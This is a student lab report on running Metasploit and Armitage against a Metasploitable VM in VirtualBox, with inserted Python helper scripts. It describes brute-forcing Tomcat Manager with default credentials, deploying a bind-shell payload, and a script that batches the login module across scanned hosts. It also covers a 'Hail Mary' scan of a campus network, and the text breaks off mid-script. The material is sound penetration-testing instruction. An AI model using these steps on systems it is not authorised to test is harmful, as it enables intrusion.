Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner, Florida Gulf Coast University, Page 1
Fall 2011
Metasploit:
Penetration Testing in a Virtual Environment
(Final Draft)
Christopher Steiner
Dr. Janusz Zalewski
CNT 4104 Fall 2011 – Networks
Florida Gulf Coast University
Fort Myers, Florida
11-20-11
1. Introduction
1.1 Project Overview
The purpose of this project is first to create a set of virtual servers with Oracle VM
VirtualBox as a test environment in which to run Metasploit, and then to repeat the exercise on
the actual Computer Science network. The Metasploit Framework is considered the de facto
standard for penetration testing. Running Metasploit against a test environment shows which
weaknesses an attacker could use, so that the network can be defended against them. Penetration
tests are often run in a virtual test environment so as not to interfere with actual network usage.
1.2 Metasploit
In order to understand the Metasploit Framework one needs to understand the basics of
penetration testing. A penetration test, often shortened to pentest, is the equivalent of
hacking a secured network for the sole purpose of finding its weaknesses so that they can be
fixed. These tests are usually run by the person in charge of network security or by someone
engaged to find the vulnerabilities in the network and fix them. One thing that needs to be made
clear is that a pentest must be done with the consent of the owner of the network; otherwise
it is simply hacking.
Metasploit was developed by H.D. Moore. He built a framework for creating and
developing exploits and released a Perl-based Metasploit in October 2003. In 2004 H.D.
rewrote the project with the help of Spoonm; that version included 19 exploits and 27
payloads. Exploits, payloads and vulnerabilities are explained later in this report.
Metasploit was rewritten in Ruby in 2007 and grew rapidly thanks to an increasingly interested
security community and user contributions. Rapid7, a widely known vulnerability-scanning
firm, acquired Metasploit in 2009. With the acquisition both H.D. and Rapid7 were able to
focus on deployment of the Framework and on the commercial lines of Metasploit: Metasploit Pro
and Metasploit Express. [6]
The need for penetration testing keeps increasing as external and internal threats to
network security have become more prevalent over the past decade. While rapid technological
advances in networks push our knowledge and abilities further, they also allow a whole new
breed of attacker to infiltrate and compromise networks. Frameworks such as Metasploit let
pentesters reproduce those attacks so that the correct defenses can be put in place.
1.2.1 Vulnerability
“A vulnerability is a security hole in a piece of software, hardware or operating system
that provides a potential angle to attack the system. A vulnerability can be as simple as weak
passwords or as complex as buffer overflows or SQL injection vulnerabilities.” [1]
As the name implies, this section is about where a network is vulnerable. One must
determine where these holes in security are and close them before they are found by an unwanted
intruder. Vulnerabilities are not limited to the software, hardware or operating systems in use;
they may also be operating procedures of the company in question. For a penetration tester,
learning as much as possible about the inner workings of a company may point to vulnerabilities
in its network. These days the intelligence gathering phase usually includes Google hacking,
social-media networks such as Facebook and other sources as well.
The old saying "Loose lips sink ships" holds here, since employees themselves can be a
vulnerability in a network: they may leak a password to the wrong person. Holes in the security
process are harder to close. They have to be addressed by means other than Metasploit, but they
can be dealt with before other kinds of penetration testing start.
Once the greatest threats to the network have been identified, vulnerability analysis
decides which attack would be the most viable. The information gathered during intelligence
gathering, coupled with port and vulnerability scans, tells the penetration tester the best place
to start exploiting the network.
1.2.2 Exploits
Once a suitable vulnerability has been found in a network, a small, specialized program
called an exploit is used to take advantage of it and give the penetration tester access to the
system. Exploits are used to deliver payloads to the target system, and the payloads are how the
penetration tester actually gains control. Payloads are introduced in the next section.
There are over 180 exploits in the Metasploit Framework. Since the security community is
encouraged to take part in the continuing development of exploits, there is also a public
database of usable exploits, which is constantly updated as new exploits are found and posted.
1.2.3 Payloads
“Payloads are pieces of code that get executed on the target system as part of an exploit
attempt. A payload is usually a sequence of assembly instructions, which helps achieve a specific
post-exploitation objective, such as adding a new user to the remote system, or launching a
command prompt and binding it to a local port. Traditionally, payloads were created from
scratch or by modifying existing pieces of assembly code. This requires an in-depth knowledge not
only of assembly programming, but also of the internal workings of the target operating system.
But a number of scripts now enable payloads to be developed without needing to modify any
assembly code at all.” [5]
The different types of payloads give the penetration tester different degrees of control
over the target system. The most commonly used payload is Meterpreter. It lets the penetration
tester turn on the target's webcam, control the mouse and keyboard, and take screenshots. These
capabilities demonstrate exactly what an attacker could do on the compromised system. Access to
key functions on one computer does not necessarily mean control over the whole network, but it
is a start in determining which parts of the network are the most vulnerable.
1.3 Oracle VM VirtualBox
In order to run a penetration test properly, a suitable network must be in place to test
against. Instead of using physical machines, this project initially runs the penetration tests in
a completely virtual environment built with Oracle VM VirtualBox.
As processing power and memory on server machines become cheaper and easier to
acquire, hosting such virtual networks becomes practical. Oracle VM VirtualBox lets the user
create virtualized copies of physical machines, either to run them full time or to test outside a
live environment. Since this project uses several guest operating systems, from Ubuntu to
Windows Server 2003, it relies on the capabilities VirtualBox provides.
There are other products such as VMware Workstation, but for the purposes of this
experiment the free and easily obtained VirtualBox will do just fine. It would even be possible
to virtualize the entire project, with the Metasploit Test Lab itself running as a virtual
machine; however, this goes beyond the scope of this project and may constitute an extension
to it.
This virtual network, even though it is hosted on a single machine, will include multiple
operating systems in strong isolation from each other. This gives great ease of access when
dealing with multiple hosts. If one had to go from machine to machine to check part of the test,
it would be very time consuming and, if the test were large enough, perhaps not feasible. With
access to any of the virtualized machines at any time, this setup cuts down on foot traffic and
provides a test environment that is secured and off the grid.
Because the network is isolated, the network the Test Lab is hosted on is protected as well.
All of the traffic stays local to the Test Lab host. Note that this holds only while every guest's
network adapter is attached to the VirtualBox host-only network, as configured in Section 4.1; a
guest attached to a NAT or bridged adapter can reach, or be reached from, the outside.
1.4 Armitage
Armitage is an open source graphical user interface for the Metasploit Framework. It
allows the user to see a visual representation of the network as well as allows point and click
exploitation and payload sending. In order to start using Armitage it must be installed on the
same test environment that the Metasploit Framework is installed.
2. Problem Description and Project Setup
2.1 Project Objective
The Metasploit Framework environment is created on a central server which will then
house three additional virtual machines. These virtual machines have different images on them
such as Ubuntu and Windows XP. The purpose of setting up these three different types of virtual
machines is to create a real world scenario in which a hacker might attempt to penetrate. Once
this test environment has proved itself a real test will be done on the FGCU Computer Science
Lab network.
2.1.1 Basic Configuration
It is assumed that all virtual machines will be running simultaneously and that the
penetration tests will be executed on all of them. A sample Metasploit layout is presented in
Figure 2.1.
Figure 2.1 – Metasploit Example Layout
The following configuration items are needed in order to create a working test lab on a
single machine with Metasploit:
- Metasploit Framework [1]
- Computer with the following specifications
  o Intel Core 2 Quad @ 2.66 GHz
  o 8 GB of RAM
  o 500 GB HDD
  o Windows 7 x64
- Oracle VM VirtualBox [2]
- Metasploitable Image [7]
- Ultimate LAMP Image [8]
- Windows XP Image
- Armitage [10]
2.2 Setting Up a Test Lab on a Single Machine
In order to create a test lab on a single machine, the three virtual machines must first be
set up. For this test lab VirtualBox is used to emulate a network to penetrate. The first step is
to download and install VirtualBox; the next is to download and install Metasploit. After these
two applications have been installed, the virtual machines for each of the three operating
systems are set up.
2.2.1 Installing Oracle VM Virtual Box
The process of virtualizing the three test environments to create the overall test lab starts
with downloading VirtualBox [3]. Since the Test Lab runs on a Windows machine, one needs to
download VirtualBox 4.1.4 for Windows hosts (x86/amd64); the process is shown in Figures
2.2-2.7. It starts with clicking the x86/amd64 link and saving the file. Once VirtualBox is
downloaded, double-click the executable to start the install process.
Figure 2.2 – Select Next
Figure 2.3 – Select Next
Figure 2.4 – Select Yes
Figure 2.5 – Select Install
After selecting Install in Figure 2.5, VirtualBox will install. Once it has completed, Next
and Finish have to be selected as in Figures 2.6 and 2.7.
Figure 2.6 – Select Next
Figure 2.7 – Select Finish
Figure 2.8 – Virtual Box is installed.
If the screen shown in Figure 2.8 appears, VirtualBox has installed successfully. It can be
closed for now; the next steps are to set up Metasploit and get the images ready to continue
building the Test Lab.
2.2.2 Installing Metasploit
Now that VirtualBox is installed, it is time to set up the penetration testing software,
Metasploit. The Metasploit Framework is to be installed on a Windows test environment, so one
needs to download the latest Windows installer [4]. Save the executable and, once it is
downloaded, start the install process shown in Figures 2.9-2.19.
Figure 2.9 – Turn off antivirus software. Select Ok.
Figure 2.10 – Turn off Windows firewall. Select Ok.
The installer asks for both because antivirus products quarantine Metasploit's exploit and
payload files, and the firewall would block the handlers the Framework listens on. Leave them off
only on the isolated Test Lab host, and re-enable the firewall before that host is used on a
production network.
Figure 2.11 – Select Next
Figure 2.12 – Select “I accept the agreement”. Select Next.
Figure 2.13 – Select a folder to install. Select Next.
Figure 2.14 –Select Next.
Figure 2.15 – This will generate an SSL certificate for this server. Select Next.
Figure 2.16 – Select Next.
Figure 2.17 – Select Next.
Figure 2.18 – Wait for Metasploit to install.
Figure 2.19 – Uncheck “Access Metasploit Web UI?”. Select Finish.
Once the screen shown in Figure 2.19 appears, the Metasploit Framework has been
successfully installed. It is recommended to do a reboot of the Test Lab computer before moving
to the next step.
2.2.3 Preparing Test Machines
After making sure that VirtualBox and the Metasploit Framework are installed correctly,
one can turn to creating the three virtual environments. The steps for all three are the same, so
the instructions below refer to setting up just one of them, Windows XP; the rest are done in
the same manner. Figures 2.20-2.29 show the setup process.
Figure 2.20 – Select New.
Figure 2.21 – Select Next.
Figure 2.22 – Enter the name of the VM. Select the Operating System and Version. Select
Next.
Figure 2.23 – Set the allocated RAM. For these VMs 1024 megabytes will suffice. Select
Next.
Figure 2.24 – Select Next.
Figure 2.25 – Select Next.
Figure 2.26 – Select Next.
Figure 2.27 – Select Next.
Figure 2.28 – Select Create.
Figure 2.29 – Select Create again.
Once the virtual machine is created, one needs to install an operating system onto it. For
this example it is a lightweight version of Windows XP that is only 360 MB. Any version of XP
can be used, and it is recommended that it come from an image file (.iso) so that it is easily
accessible in case a new virtual machine needs to be created from the same image. The process is
shown in Figures 2.30-2.34.
Figure 2.30 - First open Virtual Box and select New.
Figure 2.31 – Select Next.
Figure 2.32 – Select the Media Source. Select Next.
Figure 2.33 – Select Start.
Figure 2.34 – Highlight the newly created VM and select Start.
Once the virtual machine boots, the usual steps to install the operating system follow.
Following the on-screen instructions and installing each operating system in its own way will
do it. Now all three operating systems can be started simultaneously. Configuring the network
settings and the Metasploit Framework is described in Section 4.
2.2.4 Preparing Metasploitable Test Machine
This project uses the Metasploitable test machine from Rapid7, an intentionally vulnerable
Ubuntu Linux virtual machine built for practising the exploitation of network services.
Metasploitable is distributed as a torrent, so a BitTorrent client is needed to download the
virtual machine [7]. The steps to use an existing virtual machine are similar to creating a new
one and are shown in Figures 2.35-2.40. The first is to open VirtualBox, as shown in Figure 2.35.
Figure 2.35 – Select New.
Figure 2.36 – Select Next.
Figure 2.37 – Set the name of the VM and select Linux and Ubuntu for the Metasploitable VM.
Select Next.
Figure 2.38 – Set the amount of Memory to use. Suggested 2048MB. Select Next.
Figure 2.39 – Select Use Existing Hard Disk and use the option to search for the
Metasploitable.vmdk. Select Next.
Figure 2.40 – Select Create.
Once the Metasploitable virtual machine is created, one can start it and use it for testing
exploits and payloads. Section 4 discusses the network settings needed to create a link between
the host Test Machine and the target Metasploitable machine.
2.2.5 Downloading and Installing Armitage
Armitage is the user interface for Metasploit used in this project. To install Armitage it
must be downloaded from the Armitage website [10]. The screenshots in Figures 2.41 and 2.42
show the download process.
Figure 2.41 – Click the Download Link
On the download page, select the .zip link.
Figure 2.42 – Click the .zip link and download Armitage.
Once Armitage.zip has been downloaded it must first be unzipped.
Figure 2.43 – Contents of the .zip
The steps below describe taking the contents of the downloaded Armitage.zip and moving
them to the correct location. After that, it is a matter of updating the Metasploit Framework
and initializing the database.
1. Copy the contents into a folder called Armitage on the C: drive.
2. Start -> Programs -> Metasploit -> Framework -> Framework Update
3. Start -> Programs -> Metasploit -> Framework -> Framework Console (do this once to
initialize the database)
To run Armitage, follow these steps:
1. Start -> Programs -> Metasploit -> Framework -> Armitage
2. Click Connect.
3. Click Yes when asked whether or not to start Metasploit's RPC daemon.
4. If asked where Metasploit is installed, select the Metasploit directory. This is only
needed once.
Figure 2.44 – Armitage is successfully installed and running.
3. Test / Preparation
3.1 Overview
This project uses the Metasploit Framework together with Oracle VM VirtualBox to create
a realistic test environment for penetration testing. Virtualizing multiple computers is needed
in order to show the power and functionality of the Metasploit Framework. The project requires
that all of the virtual machines (VMs) be on the same network. Once the VMs have been created,
the Metasploit Framework is used to find vulnerabilities, run exploits and deliver payloads to
them.
The output of these tests is documented and different test cases are monitored. The test
environment runs on a machine in the FGCU Computer Science Lab. This machine is loaded with
the Metasploit Framework and hosts all three of the VMs.
Once testing of the virtual machines has been accomplished, a test on the FGCU Computer
Science Lab network will be run. It will scan the network for vulnerabilities and attempt to
exploit them.
3.2 Current Testing Environment
Currently the Metasploit Test Lab includes the host machine with one virtual machine
running Metasploit's own test server, Metasploitable. After downloading the Metasploitable
image from Metasploit's website [1], the image is loaded into VirtualBox and booted, as shown
in Figure 3.1.
Figure 3.1 – Booted Metasploitable image.
Once the Metasploitable virtual machine is up, the Metasploit Framework can be started in
order to begin exploiting the target machine. Figure 3.2 shows the launched msfconsole.
msfconsole is launched from the Start menu by choosing Metasploit console under Metasploit.
Figure 3.2 – msfconsole ready and waiting for input
Once the msfconsole is ready one needs to set up the virtual network and then can start
doing some penetration testing on the Metasploitable virtual machine. The implementation of
this testing is discussed in Section 4.
4. Implementation
4.1 Setting up the Virtual Network
When VirtualBox is installed, a new network adapter is created on the host, called
VirtualBox Host-Only Network. This adapter is used to create a local area network with the
virtual target machines. Figure 4.1 shows the VirtualBox Host-Only Network adapter that will be
used.
Figure 4.1 – VirtualBox Host-Only Network
The virtual target machines must exist before their network settings can be changed. The
Metasploitable virtual machine is used to show how to switch a machine's network settings to
the virtual local network.
Figure 4.2 – Highlight the Metasploitable Virtual Machine. Click Settings.
Figure 4.3 – Select Network and in the dropdown for Attached to: Select Host-Only
Adapter.
This is shown in Figures 4.2 and 4.3. It connects the virtual machine to the network adapter
created by VirtualBox, establishing a link to the virtual local network.
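The isolation the Test Lab relies on (Section 1.3) holds only if every guest's adapter is attached as in Figure 4.3. The following Python script, added here as an example and not part of the original paper or of VirtualBox, checks that from the output format of VBoxManage showvminfo <vm> --machinereadable and produces the VBoxManage modifyvm commands that would move a NAT or bridged NIC onto the host-only network. The two showvminfo texts embedded below are constructed, the VM names are assumed, and the adapter name is the one VirtualBox registers on a Windows host.

```python
"""Added example: audit the Test Lab guests' network attachments using the
machine-readable output of `VBoxManage showvminfo <vm> --machinereadable`.
Not part of the paper or of VirtualBox; the two showvminfo texts below are
constructed and the VM names are assumed."""
import re
import subprocess

# Name VirtualBox registers for the host-only interface on a Windows host.
HOSTONLY_ADAPTER = "VirtualBox Host-Only Ethernet Adapter"

# Attachments that keep guest traffic on the Test Lab host. 'intnet' is
# guest-to-guest only, so it cannot reach the outside either.
ISOLATED = ("none", "hostonly", "intnet")

# Constructed sample output: one guest isolated correctly, one leaking.
SAMPLE = {
    "Metasploitable": (
        'name="Metasploitable"\n'
        'nic1="hostonly"\n'
        'hostonlyadapter1="VirtualBox Host-Only Ethernet Adapter"\n'
        'nictype1="Am79C973"\n'
        'nic2="none"\n'
        'nic3="none"\n'
    ),
    "WinXP": (
        'name="WinXP"\n'
        'nic1="bridged"\n'
        'bridgeadapter1="Realtek PCIe GBE Family Controller"\n'
        'nic2="nat"\n'
        'nic3="none"\n'
    ),
}

NIC_RE = re.compile(r'^nic(\d+)="([^"]*)"$')


def parse_nics(text):
    """{slot: attachment} for every nicN="..." line, e.g. {1: 'hostonly', 2: 'none'}."""
    nics = {}
    for line in text.splitlines():
        m = NIC_RE.match(line.strip())
        if m:
            nics[int(m.group(1))] = m.group(2)
    return nics


def leaking_nics(text):
    """Slots whose attachment (nat, bridged, generic, ...) can reach beyond the host."""
    return sorted(slot for slot, kind in parse_nics(text).items() if kind not in ISOLATED)


def repair_commands(vm, text, adapter=HOSTONLY_ADAPTER):
    """VBoxManage invocations that move each leaking NIC onto the host-only network."""
    return [["VBoxManage", "modifyvm", vm, f"--nic{slot}", "hostonly",
             f"--hostonlyadapter{slot}", adapter] for slot in leaking_nics(text)]


def audit(infos):
    """infos: {vm: showvminfo text}. Returns {vm: [repair command, ...]} for guests that leak."""
    return {vm: repair_commands(vm, text) for vm, text in infos.items() if leaking_nics(text)}


def showvminfo(vm):
    """Live query for use on a real VirtualBox host (the VM must be powered off
    before modifyvm will apply the repair)."""
    return subprocess.run(["VBoxManage", "showvminfo", vm, "--machinereadable"],
                          check=True, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for vm, cmds in audit(SAMPLE).items():
        for cmd in cmds:
            print(" ".join(cmd))
```

On a live host, replace SAMPLE with {vm: showvminfo(vm) for vm in names} and run the printed commands while the guests are powered off; a guest that passes the audit can only talk to the host's 192.168.56.1 adapter and to the other host-only guests.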
To verify network connectivity, start the Metasploitable virtual machine and log in with
the username msfadmin and the password msfadmin.
Figure 4.4 – Screen that appears after logging in.
After logging in, the screen shown in Figure 4.4 should appear. Next run the ifconfig
command, as shown in Figure 4.5. The VirtualBox host-only network keeps 192.168.56.1 for the
host's own adapter and hands out guest addresses by DHCP starting at 192.168.56.101; since this
machine was created first and is the only one on the virtual network, it received 192.168.56.101.
One can now ping this address from the host machine, as shown in Figure 4.6.
Figure 4.5 – Response from ifconfig on Metasploitable
Figure 4.6 – Successful ping attempt.
The virtual network has been created and the Host and Target machine are
communicating. Now exploits can be created and executed between the machines.
4.2 Selecting an Exploit
Before selecting or using exploits it is advisable to take a snapshot of the target machine
so that it can be reverted to a clean state. This saves time later, since some exploits leave the
target in a condition that would otherwise require a complete reinstall.
To do this on the target machine select Machine > Take Snapshot. This will bring up the
screen shown in Figure 4.7.
Figure 4.7 – Taking a snapshot. Put in Snapshot name and hit Ok.
In order to discover vulnerabilities to exploit, the first thing that must be done is to
discover the machines on the network. This would be done in a normal engagement, so it is
included here.
First, sweep the network with a simple ping scan to determine which hosts are online. This
is done with the command nmap -sP 192.168.56.1/24 (newer Nmap releases spell this option -sn),
as shown in Figure 4.8.
Figure 4.8 – NMAP scan results
The sweep shows three live hosts on this network, among them 192.168.56.1, the host's own
adapter, and 192.168.56.101. Since the Metasploitable target is known to be 192.168.56.101, the
remainder of the exploit uses this IP address as the target.
Now that the IP address is known, the next step is to find out which programs are listening
on which ports. The service chosen will be used in the exploit to gain access to the machine, so
its port number must be known. The command is nmap -sV 192.168.56.101, as shown in Figure 4.9.
Figure 4.9 – NMAP port scan results
For this example the service chosen to exploit is the Apache Tomcat/Coyote JSP engine 1.1,
which is listening on port 8180.
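Reading the port and product off a screenshot does not scale past one host. As an added example (not part of the paper, of Nmap or of Metasploit), the Python below parses the XML that nmap -sV -oX scan.xml writes, picks out every host advertising Tomcat, and emits an msfconsole resource script that runs the login module from the next step against each one. The XML embedded here is constructed to resemble the Metasploitable scan in Figure 4.9; the resource-file commands are the ones msfconsole accepts.

```python
"""Added example: parse an `nmap -sV -oX` report and turn any Tomcat finding
into the msfconsole commands used in this section. Not part of the paper, of
Nmap or of Metasploit; the XML below is constructed to resemble Figure 4.9."""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.56.0/24">
 <host><status state="up"/><address addr="192.168.56.1" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="135"><state state="open"/>
   <service name="msrpc" product="Microsoft Windows RPC"/></port></ports>
 </host>
 <host><status state="up"/><address addr="192.168.56.101" addrtype="ipv4"/>
  <ports>
   <port protocol="tcp" portid="22"><state state="open"/>
    <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
   <port protocol="tcp" portid="80"><state state="open"/>
    <service name="http" product="Apache httpd" version="2.2.8"/></port>
   <port protocol="tcp" portid="8009"><state state="open"/>
    <service name="ajp13" product="Apache Jserv" version="Protocol v1.3"/></port>
   <port protocol="tcp" portid="8180"><state state="open"/>
    <service name="http" product="Apache Tomcat/Coyote JSP engine" version="1.1"/></port>
   <port protocol="tcp" portid="8787"><state state="filtered"/></port>
  </ports>
 </host>
 <host><status state="down"/><address addr="192.168.56.102" addrtype="ipv4"/></host>
</nmaprun>
"""


def parse_services(xml_text):
    """[(ip, port, product, version)] for every open TCP port on a host that is up."""
    found = []
    for host in ET.fromstring(xml_text).iter("host"):
        if host.find("status").get("state") != "up":
            continue
        ip = host.find("address[@addrtype='ipv4']").get("addr")
        for port in host.iter("port"):
            if port.get("protocol") != "tcp" or port.find("state").get("state") != "open":
                continue
            svc = port.find("service")          # absent when -sV could not probe the port
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            found.append((ip, int(port.get("portid")), product, version))
    return found


def tomcat_targets(services):
    """(ip, port) pairs whose product string identifies Tomcat."""
    return [(ip, port) for ip, port, product, _ in services if "tomcat" in product.lower()]


def login_resource_script(targets):
    """msfconsole resource file (run with `msfconsole -r file.rc`) that runs
    tomcat_mgr_login against each target with the module's default wordlists."""
    lines = []
    for ip, port in targets:
        lines += ["use auxiliary/scanner/http/tomcat_mgr_login",
                  f"set RHOSTS {ip}", f"set RPORT {port}", "run"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(login_resource_script(tomcat_targets(parse_services(SAMPLE_XML))))
```

Only ports in state open on hosts that are up are kept; the filtered port and the down host in the sample are skipped, which is what keeps the target list honest when the scan covers a whole /24.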
The module used first, named 'Tomcat Application Manager Login Utility'
(auxiliary/scanner/http/tomcat_mgr_login), is provided by Matteo Cantoni and jduck and tests a
list of default credentials against the Tomcat Manager application.
Figure 4.10 – Select Exploit
Setting up the module consists of selecting it with use, setting RHOSTS to the machine being
tested (in this case 192.168.56.101), setting RPORT (in this case 8180) and entering the exploit
command (run is equivalent for auxiliary modules), as shown in Figure 4.10.
The result is a long list of username/password attempts. Figure 4.11 shows a working
username/password pair.
Figure 4.11 – Found successful login
Now that a working username/password pair has been found, an exploit can be set up to
deliver a payload.
4.3 Payloads
Metasploit contains many different types of payloads, each serving a unique role within
the framework. Let's take a brief look at the various types of payloads available and get an idea
of when each type should be used.
Inline (Non Staged)
A single payload containing the exploit and full shell code for the selected task.
Inline payloads are by design more stable than their counterparts because they
contain everything all in one. However some exploits won’t support the resulting
size of these payloads.
Staged
Stager payloads work in conjunction with stage payloads in order to perform a
specific task. A stager establishes a communication channel between the attacker
and the victim and reads in a stage payload to execute on the remote host.
Meterpreter
Meterpreter, the short form of Meta-Interpreter is an advanced, multi-faceted
payload that operates via dll injection. The Meterpreter resides completely in the
memory of the remote host and leaves no traces on the hard drive, making it very
difficult to detect with conventional forensic techniques. Scripts and plugins can
be loaded and unloaded dynamically as required and Meterpreter development is
very strong and constantly evolving.
PassiveX
PassiveX is a payload that can help in circumventing restrictive outbound
firewalls. It does this by using an ActiveX control to create a hidden instance of
Internet Explorer. Using the new ActiveX control, it communicates with the
attacker via HTTP requests and responses.
NoNX
The NX (No eXecute) bit is a feature built into some CPUs to prevent code from
executing in certain areas of memory. In Windows, NX is implemented as Data
Execution Prevention (DEP). The Metasploit NoNX payloads are designed to
circumvent DEP.
Ord
Ordinal payloads are Windows stager based payloads that have distinct
advantages and disadvantages. The advantages are that it works on every flavor
and language of Windows dating back to Windows 9x without the explicit
definition of a return address. They are also extremely tiny. However two very
specific disadvantages make them not the default choice. The first one is that it
relies on the fact that ws2_32.dll is loaded in the process being exploited before
exploitation. The second one is that it's a bit less stable than the other stagers.
IPv6
The Metasploit IPv6 payloads, as the name indicates, are built to function over
IPv6 networks.
As soon as valid credentials have been found, jduck's Tomcat Manager Application
Deployer (exploit/multi/http/tomcat_mgr_deploy) can be used with them, as shown in Figure 4.12.
The module uploads a WAR file containing the payload through the Manager application and then
requests it, so the payload runs inside Tomcat's Java process with the privileges of the Tomcat
service account.
Figure 4.12 – Setting up tomcat_mgr_deploy
Once these settings have been set up correctly, a payload can be set and exploited. In
order to find a valid payload one can use the command show payloads, as presented in Figure
4.13.
4.13 – Valid Payloads
Since Apache Tomcat runs a JSP engine, the appropriate payload is
java/shell/bind_tcp, which opens a connection to Metasploitable and gives control of its shell. The
respective command to set a payload is: ‘set PAYLOAD java/shell/bind_tcp’, then exploit, as
shown in Figure 4.14.
Figure 4.14 – Successful payload delivery
After this, control of the shell of the target is possible, as shown in Figure 4.15.
Figure 4.15 – ls command on remote shell
4.4 FGCU Computer Science Lab Network Penetration Test
After the virtual test environment has been successfully exploited, Armitage can be used as a
tool in order to scan and locate vulnerabilities on the FGCU Computer Science Lab network
using the designated lab computer in the FGCU Computer Science Lab to conduct the scan. The
lab computer must be on the FGCU Computer Science Lab network in order to exclude the main
FGCU network. The IP address used for the designated lab computer is 69.88.163.15.
To start Armitage on the FGCU Lab Computer, follow this step as shown in Figure 4.16.
Go to Start -> Metasploit -> Framework -> Armitage in order to start Armitage.
Figure 4.16 – Location of Armitage on Lab Computer
When running Armitage a prompt will come up as shown in Figure 4.17, click Connect.
Figure 4.17 – Connect screen for Armitage
Once Armitage is running go to Hosts -> Nmap Scan -> Quick Scan, as shown in Figure
4.18.
Figure 4.18 – Quick Scan
Then enter the IP range you wish to run the scan on. This example uses the CS network
69.88.163.0/24. Then click OK, as shown in Figure 4.19.
Figure 4.19 – Scan range.
Once the scan is completed the discovered targets will appear in the upper part of the
console, along with their IP addresses, as shown in Figure 4.20. One can dig down into each
individual target by right clicking the target and clicking on Scan. This will run a multitude of
scans on the individual target and show what is running on the open ports. Provided there are
open ports, it will also show what type of operating system the target is running. If there are no open
ports or Armitage cannot gather enough information about the target, the icon for the target will
remain blank. It will show a Windows symbol for Windows targets and a Tux Penguin for Linux
targets.
Figure 4.20 – After a scan of the network.
There are two ways to initiate attacks. One way is by going to Attacks -> Find
Attacks. This will give a list of attacks by target. This list can be accessed by right clicking on
the target and going to the Attacks menu item from the drop down as shown in Figure 4.21. The
other way is to do a Hail Mary as shown in Figure 4.22. The Hail Mary will generate a list of all
possible exploits that pertain to the current network setup. It will then execute each exploit one
by one until a vulnerability is found.
Figure 4.21 – Attack menu of one of the targets.
Figure 4.22 – A Hail Mary attempt.
In Figure 4.22 the Hail Mary attempt yielded no vulnerabilities on the network. It tried all
of the exploits and no sessions were created. If a session had been created it would be a sign that
one of the exploits completed correctly. Even though this attempt isn’t the most in-depth scan of
the vulnerabilities, each target can additionally be checked individually in the Attack dropdown menu. This
network yielded no vulnerabilities that Metasploit and Armitage could find.
4.5 Using Armitage with Metasploitable
Another example is to use the Metasploitable virtual machine in order to replicate the
attempt on the Tomcat web server. A quick scan can be done for the virtual network by using
192.168.56.0/24. Figures 4.23 and 4.24 show this process.
Figure 4.23 – Quick Scan (OS Detect)
Figure 4.24 – Entering the IP range for the virtual network. Click OK.
Once the scan is completed the Metasploitable virtual machine, which is 192.168.56.102,
will show under the targets screen along with the machine that the scan was run from. Figure
4.25 shows the two machines in the targets screen.
Figure 4.25 – Local machine and Metasploitable virtual machine
Right clicking on the Metasploitable machine will yield a drop down menu that is shown
in Figure 4.26. The menu includes Login, Services, Scan and Host. Since no intensive scan has
been done on this machine, one will need to be run. In the drop down menu select Scan.
Figure 4.26 – Drop down menu options for this machine. Select Scan.
Once the scan has finished one can see which services this machine is running by
selecting the Services option from the drop down shown in Figure 4.26. This opens a new tab in
the console section of Armitage with a list of the services detected on the open ports. Figure 4.27 shows this
tab.
Figure 4.27 – Services tab for Metasploitable machine
The list in Figure 4.27 shows all of the open ports on the Metasploitable machine. In
order to see which attacks can be used one must first Find Attacks. Figures 4.28 and 4.29 show
how this is done.
Figure 4.28 – Select Attacks, then Find Attacks.
Figure 4.29 – After the analysis is complete, click OK.
Armitage has provided a list of attacks that can now be accessed when right clicking the
Metasploitable machine as shown in Figure 4.30. This list of attacks can be used intuitively to
initiate attacks immediately or to run auxiliary scans before these attacks. Such is the case with
tomcat_mgr_deploy. This exploit will not work without a username and password entered into
the options, so one must first find a valid username and password pair. The tomcat_mgr_login
auxiliary module is used for brute forcing log-in attempts until a successful log-in is found.
Figure 4.30 – Attack list showing available exploits.
In order to search for this auxiliary scan, one can use the exploit database on the left hand
side of Armitage. Figure 4.31 shows how to use this search feature to find tomcat_mgr_login.
Figure 4.31 – Type tomcat into the search and hit enter.
Double clicking the tomcat_mgr_login scanner will bring up an options window. This
options window is used for managing the module's individual options and, once these are all set,
launching it. Figure 4.27 shows the services that are currently running on the Metasploitable
virtual machine; the Tomcat server is running on port 8180. This is important to understand
because the port needs to be set correctly in the options. Figure 4.32 shows how the options
window looks.
Figure 4.32 – Set the correct port and then click Launch.
The tomcat_mgr_login scanner will run and detect the username and password
combination tomcat/tomcat as a valid login. This is then used in the attack itself. Following
Figure 4.30, select tomcat_mgr_deploy and once again set the correct settings for username,
password and port as shown in Figure 4.33.
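The sequence just described (a burst of failed manager log-ins, then a successful log-in with a default account, then a deployment) leaves a recognisable trace in the Tomcat access log. The following Python is an added defender-side example, not part of the original paper or of Metasploit; the log lines are constructed, and the manager request paths used in them are assumptions about how the manager interface is reached rather than taken from the modules.

```python
import re
from collections import defaultdict

# Constructed sample lines in Tomcat's common access-log format (not real data).
SAMPLE_LOG = """\
192.168.56.1 - - [20/Nov/2011:10:15:30 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.1 - - [20/Nov/2011:10:15:30 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.1 - - [20/Nov/2011:10:15:31 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.1 - - [20/Nov/2011:10:15:31 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.1 - - [20/Nov/2011:10:15:32 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.1 - tomcat [20/Nov/2011:10:15:32 -0500] "GET /manager/html HTTP/1.1" 200 19134
192.168.56.1 - tomcat [20/Nov/2011:10:16:01 -0500] "PUT /manager/deploy?path=/Ab3xQ HTTP/1.1" 200 63
192.168.56.1 - - [20/Nov/2011:10:16:02 -0500] "GET /Ab3xQ/ HTTP/1.1" 200 0
192.168.56.20 - admin [20/Nov/2011:11:02:10 -0500] "GET /manager/html HTTP/1.1" 200 19134
"""

# Fields of one access-log line: client IP, authenticated user, timestamp,
# request method and path, and the HTTP status code.
LINE_RE = re.compile(
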